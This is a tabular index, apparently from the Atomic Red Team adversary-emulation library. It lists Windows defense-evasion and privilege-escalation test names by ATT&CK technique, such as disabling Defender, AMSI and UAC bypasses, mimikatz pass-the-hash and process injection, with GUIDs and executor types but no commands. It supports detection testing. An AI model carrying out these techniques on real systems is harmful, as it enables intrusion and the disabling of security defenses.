225 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
226 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
227 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
228 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
229 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
230 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
231 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
232 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
233 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
234 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
235 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
236 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
237 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
238 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
239 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
240 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
241 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
242 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
243 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
244 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Defender with Defender Control 178136d8-2778-4d7a-81f3-d517053a4fd6 powershell
245 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
246 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
247 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
248 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
249 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
250 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
251 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
252 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
253 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
254 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
255 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
256 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
257 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
258 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
259 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
260 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
261 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
262 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
263 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
264 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
265 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
266 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
267 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
268 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
269 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
270 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
271 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
272 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
273 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
274 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
275 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
276 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
277 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
278 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
279 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
280 defense-evasion T1036.003 Masquerading: Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
281 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
282 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
283 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
284 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
285 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
286 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
287 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
288 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
289 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
290 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
291 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
292 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
293 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
294 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
295 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
296 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
297 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
298 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
299 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
300 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
301 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
302 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
303 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
304 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
305 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
306 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
307 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
308 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
309 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
310 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
311 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
312 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
313 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
314 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
315 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
316 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
317 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
318 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
319 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
320 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
321 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
322 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
323 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
324 defense-evasion T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
325 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
326 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
327 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 1 Lolbin Jsc.exe compile javascript to exe 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 command_prompt
328 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 2 Lolbin Jsc.exe compile javascript to dll 3fc9fea2-871d-414d-8ef6-02e85e322b80 command_prompt
329 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
330 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
331 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
332 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
333 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
334 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
335 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
336 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
337 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
338 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
339 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
340 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
341 privilege-escalation T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
342 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
343 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
344 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
345 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
346 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
347 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
348 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
349 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
350 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
351 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
352 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
353 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
354 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
355 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
356 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
357 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
358 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
359 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
360 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
361 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
362 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
363 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
364 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
365 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
366 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
367 privilege-escalation T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
368 privilege-escalation T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
369 privilege-escalation T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
370 privilege-escalation T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
371 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
372 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
373 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
374 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
375 privilege-escalation T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
376 privilege-escalation T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
377 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
378 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
379 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
380 privilege-escalation T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
381 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
382 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
383 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
384 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
385 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
386 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
387 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
388 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
389 privilege-escalation T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
390 privilege-escalation T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
391 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
392 privilege-escalation T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
393 privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
394 privilege-escalation T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
395 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
396 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
397 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
398 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
399 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
400 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
401 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
402 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
403 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
